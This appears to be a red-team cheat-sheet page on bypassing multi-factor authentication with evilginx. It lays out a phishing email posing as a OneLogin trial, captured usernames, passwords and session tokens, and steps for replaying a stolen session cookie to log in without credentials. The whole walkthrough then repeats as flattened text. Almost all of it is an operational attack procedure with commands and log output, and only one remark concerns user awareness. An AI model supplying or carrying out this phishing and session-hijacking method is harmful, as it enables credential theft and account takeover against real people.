MFA BYPASS

#example trigger
root@victim:~$ BROWSER > https://mail.google.com
 FROM: redteam@gmail.com
 SUBJECT: OneLogin - [Instructions] Activate your 30 Day OneLogin Trial

 redirect: {evilginx phish URL}

 * note: if users have some email security awareness training, they will be able to identify
   the malicious URLs whenever they hover their mouse on the links
    - if users aren't aware and clicked the links, they will be sent to the
      specified URLs being served by the evilginx server
      
    - evilginx will eventually capture anything the victim enters in the HTML fields to include username/password/tokens
       - once everything is captured, evilginx will redirect the user to any specified URLs or site
          - if is best to redirect users to the legitimate site!
          
#MFA Bypass using captured tokens re-use
root@oco:~$ sudo ./evilginx ...
evilginx:
 captured data...
  [05:46:00] [+++] [0] Username: [{emp@gmail.com},remember_username]
  [05:46:10] [+++] [0] Password: [{arbitraryValue}]
  [05:46:03] [+++] [0] Detected authorization URL - tokens intercepted: /client/apps
   - captured tokens can be re-used to login to the legitimate site w/o supplying username or passwords

 * one the victim user enters their credentials, evilginx will capture the data
    - the captured credentials can then be used to for account takeover

root@oco:~$ sudo -i
root@oco:~$ ls -la
 .evilginx
root@oco:~$ cd .evilginx/
root@oco:~$ ls
 blacklist.txt config.yaml crt data.db
root@oco:~$ cat data.db
 sub_session_onelogin.com...,Value: eyJ0eXA...
 * identified cookies will show up here
    - this cookie can be used to bypass login portals

#bypass method by going to the legitimate website
root@oco:~$ BROWSER > https://app.onelogin.com/login > F12 > Application > Storage > Cookies > Session Cookie
 Name: {sub_session_onelogin.com}
  - enter the cookie name captured in evilginx
 Value: {arbitraryValue}
  - enter/replace the current cookie value with the one captured in evilginx (if any)
 
 * ignore the login page as that is not necessary for cookie logins

root@oco:~$ BROWSER > https://app.onelogin.com
 * remove the entire parameter leaving only the subdomain.domain.tld URL
    - the cookie will take care of everything and will automatically log in via the cookie value

PreviousCREDENTIAL HARVESTING NextGOPHISH

Last updated 3 months ago

#example trigger root@victim:~$ BROWSER > https://mail.google.com FROM: redteam@gmail.com SUBJECT: OneLogin - [Instructions] Activate your 30 Day OneLogin Trial redirect: {evilginx phish URL} * note: if users have some email security awareness training, they will be able to identify the malicious URLs whenever they hover their mouse on the links - if users aren't aware and clicked the links, they will be sent to the specified URLs being served by the evilginx server - evilginx will eventually capture anything the victim enters in the HTML fields to include username/password/tokens - once everything is captured, evilginx will redirect the user to any specified URLs or site - if is best to redirect users to the legitimate site! #MFA Bypass using captured tokens re-use root@oco:~$ sudo ./evilginx ... evilginx: captured data... [05:46:00] [+++] [0] Username: [{emp@gmail.com},remember_username] [05:46:10] [+++] [0] Password: [{arbitraryValue}] [05:46:03] [+++] [0] Detected authorization URL - tokens intercepted: /client/apps - captured tokens can be re-used to login to the legitimate site w/o supplying username or passwords * one the victim user enters their credentials, evilginx will capture the data - the captured credentials can then be used to for account takeover root@oco:~$ sudo -i root@oco:~$ ls -la .evilginx root@oco:~$ cd .evilginx/ root@oco:~$ ls blacklist.txt config.yaml crt data.db root@oco:~$ cat data.db sub_session_onelogin.com...,Value: eyJ0eXA... * identified cookies will show up here - this cookie can be used to bypass login portals #bypass method by going to the legitimate website root@oco:~$ BROWSER > https://app.onelogin.com/login > F12 > Application > Storage > Cookies > Session Cookie Name: {sub_session_onelogin.com} - enter the cookie name captured in evilginx Value: {arbitraryValue} - enter/replace the current cookie value with the one captured in evilginx (if any) * ignore the login page as that is not necessary for cookie logins root@oco:~$ BROWSER > https://app.onelogin.com * remove the entire parameter leaving only the subdomain.domain.tld URL - the cookie will take care of everything and will automatically log in via the cookie value